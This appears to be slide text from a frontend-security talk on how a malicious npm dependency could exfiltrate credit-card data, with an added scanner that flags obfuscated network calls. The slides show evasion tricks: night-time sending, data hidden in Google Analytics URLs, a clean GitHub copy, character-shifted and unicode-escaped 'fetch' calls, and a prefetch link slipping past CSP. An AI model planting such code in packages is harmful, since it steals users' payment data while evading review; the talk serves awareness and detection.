Be careful!!!

How to steal your credit card?

Search for inputs with it)

XSS, CSRF, SQL-injection

What dependencies do you have?

Don't you have it now?

I'll see it in devtools

https://jsfiddle.net/gcdfs3oo/

https://jsfiddle.net/evnrorea/

I'll see it in an HTTP monitoring tool?

Just send the information at night)

Make it like this:

https://www.google-analytics.com/collect?v=1&tid=UA-90567577-1&cid=cn9n6fhuu2u8&t=event&ec=CookieConsentBar&ea=www.google.com

I'll see it on GitHub

Store a clean version on GitHub

I'll see it in node_modules

const i = 'gfudi';
const k = s => s.split('')
                .map(c => String.fromCharCode(c.charCodeAt() - 1))
                .join('');
self[k(i)](urlWithYourPreciousData);
self['\u0066\u0065\u0074\u0063\u0068'](...)
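A reviewer's counter-check for the two tricks above, as an added example that is not part of the original slides: it scans source text for string literals that only become a network API name after decoding escapes or shifting character codes. The names `SINKS`, `decodeEscapes`, `shift` and `findHiddenSinks` and the sample input are constructed for illustration.

```javascript
// Network sinks that ordinary code calls by name, not via a decoded string.
const SINKS = ['fetch', 'XMLHttpRequest', 'sendBeacon', 'WebSocket', 'EventSource'];

// Decode \u{...}, \uXXXX and \xXX escapes the way the JS parser would.
const decodeEscapes = s => s
  .replace(/\\u\{([0-9a-fA-F]+)\}/g, (_, h) => String.fromCodePoint(parseInt(h, 16)))
  .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
  .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));

// Shift every character code by n (the snippet above corresponds to n = -1).
const shift = (s, n) => [...s].map(c => String.fromCharCode(c.charCodeAt(0) + n)).join('');

// Report literals that hide a sink name behind escapes or a small shift.
function findHiddenSinks(source, maxShift = 3) {
  const findings = [];
  const literal = /(['"`])((?:\\.|(?!\1)[^\\])*)\1/g; // single-line string literals
  source.split('\n').forEach((text, idx) => {
    for (const m of text.matchAll(literal)) {
      const raw = m[2];
      const decoded = decodeEscapes(raw);
      if (raw !== decoded && SINKS.includes(decoded)) {
        findings.push({ line: idx + 1, literal: raw, sink: decoded, how: 'escape' });
        continue;
      }
      for (let n = -maxShift; n <= maxShift; n++) {
        const candidate = shift(decoded, n);
        if (n !== 0 && SINKS.includes(candidate)) {
          findings.push({ line: idx + 1, literal: raw, sink: candidate, how: `shift ${n}` });
        }
      }
    }
  });
  return findings;
}

// Constructed sample: the two patterns from the slide plus two benign lines.
const SAMPLE = String.raw`const i = 'gfudi';
const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() - 1)).join('');
self[k(i)](url);
self['\u0066\u0065\u0074\u0063\u0068'](url);
const label = 'fetch users';
fetch('/api/users');`;

console.log(findHiddenSinks(SAMPLE));
```

A hit is a reason to read the package by hand; a clean result only means these two encodings were not used.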

I have a CSP

const linkEl = document.createElement('link');
linkEl.rel = 'prefetch';
linkEl.href = urlWithYourPreciousData;
document.head.appendChild(linkEl);

https://w3c.github.io/webappsec-csp/#directive-prefetch-src

Current state of CSP

What to do?

Don't use other dependencies on important pages?

Frontend security

By Vladimir
